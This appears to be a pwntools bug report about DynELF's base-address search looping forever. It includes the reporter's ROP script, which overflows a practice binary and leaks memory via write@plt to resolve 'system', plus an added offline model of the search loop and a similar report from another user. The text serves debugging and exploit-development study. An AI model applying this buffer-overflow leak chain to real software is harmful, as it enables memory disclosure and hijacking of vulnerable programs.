pwntools
DynELF cannot break the endless loop in dynelf.py
This is my code:

```python
from pwn import *

p = process("./pwn1_64")
e = ELF("pwn1_64")

plt_write_addr = e.plt["write"]
start_addr = e.symbols["vulnerable_function"]
pop_rsi_rdx_rdi_addr = 0x40053b

def leak(address):
    # DynELF calls this with an address and expects back the bytes stored there.
    # The gadget pops rsi, rdx, rdi in that order, so this calls
    # write(1, address, 4) and then returns to vulnerable_function
    # so the next leak can be issued.
    payload1 = b"a" * 136                      # bytes, so it concatenates with p64() on Python 3 as well
    payload1 += p64(pop_rsi_rdx_rdi_addr) + p64(address) + p64(4) + p64(1)
    payload1 += p64(plt_write_addr)
    payload1 += p64(start_addr)
    p.sendline(payload1)
    data = p.recv()
    return data

dyn_elf = DynELF(leak, elf=e)
system_addr = dyn_elf.lookup("system", "libc")
```
When I execute this line,

```python
dyn_elf = DynELF(leak, elf=e)
```

the program gets stuck.

So I tried to debug it and stepped into "dynelf.py", discovering that in class DynELF -> function _find_base,
```python
def _find_base(self, ptr):
    page_size = 0x1000
    page_mask = ~(page_size - 1)

    ptr &= page_mask

    w = None
    while True:
        if self.leak.compare(ptr, '\x7fELF'):
            break

        # See if we can short circuit the search
        fast = self._find_base_optimized(ptr)
        if fast:
            ptr = fast
            continue

        ptr -= page_size

        if ptr < 0:
            raise ValueError("Address is negative, something is wrong!")

        # Defer creating the spinner in the event that 'ptr'
        # is already the base address
        w = w or self.waitfor("Finding base address")
        self.status('%#x' % ptr)

    # If we created a spinner, print the success message
    if w:
        self.success('%#x' % ptr)

    return ptr
```
the condition for breaking the loop is never met.

I don't know why. But I found something interesting. While debugging, I once tried to run my Python script in the console line by line. I mean, after one line of code had executed in the Python interpreter, I typed the next line into the console and waited for it to execute, too.

When I typed

```python
dyn_elf = DynELF(leak, elf=e)
```

it was no surprise that the program got stuck.

So I pressed Ctrl+C to stop this code.

But when I typed the same code to try again, the program didn't get stuck at all! But it seems to work very badly.

Here is the screenshot.

I don't know why, either. But I hope this situation can help you. This is my pwn file: pwn1_64.zip. I hope it can help you, too!
My English is a little poor, I hope it didn't disturb you.
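A small offline model of the base search, added here and not part of pwntools or the reporter's script: it reimplements the page walk from `_find_base` over a constructed memory image, gives it a page budget so a leak callback that returns the wrong bytes fails loudly instead of spinning, and adds a check of the leak callback against a known address before it is handed to DynELF. The memory contents and the `echo` misbehaviour are constructed assumptions, not a diagnosis of the reporter's binary.

```python
import struct

PAGE = 0x1000
ELF_MAGIC = b"\x7fELF"

def build_fake_memory(base):
    """Constructed memory image: an ELF header at `base`, zero bytes elsewhere."""
    header = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9  # constructed e_ident-like bytes
    return {base + i: byte for i, byte in enumerate(header)}

def make_leak(mem, echo=None):
    """Return a leak(address, n) callback like the one handed to DynELF.
    If `echo` is set, the callback mimics a misbehaving leak that returns
    a fixed string (e.g. a prompt) instead of the bytes at `address`."""
    def leak(address, n=4):
        if echo is not None:
            return echo
        return bytes(mem.get(address + i, 0) for i in range(n))
    return leak

def find_base(leak, ptr, max_pages=64):
    """Page-aligned backward search for the ELF magic, as DynELF._find_base
    does, but with a page budget so a bad leak raises instead of looping."""
    ptr &= ~(PAGE - 1)
    for _ in range(max_pages):
        if leak(ptr, 4) == ELF_MAGIC:
            return ptr
        ptr -= PAGE
        if ptr < 0:
            raise ValueError("Address is negative, something is wrong!")
    raise RuntimeError("no ELF header within %d pages; check that leak() "
                       "returns the bytes at the requested address" % max_pages)

def check_leak(leak, known_addr, expected):
    """Sanity check before using DynELF: the bytes the callback returns for
    an address with known contents must equal those contents."""
    return leak(known_addr, len(expected)) == expected

def search_terminates(leak, ptr, max_pages=8):
    """True if the bounded search found a base, False if the budget ran out."""
    try:
        find_base(leak, ptr, max_pages)
        return True
    except RuntimeError:
        return False
```

Running `check_leak` against the ELF magic at the binary's load address (0x400000 for a non-PIE x86-64 binary) is a cheap way to tell a wrong callback apart from a genuine DynELF problem.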
Similar to the above, I encountered a problem in which the DynELF function could not jump out of the loop and caused a memory leak, resulting in the PoC process being killed by the system. My pwntools version is v4.5.0.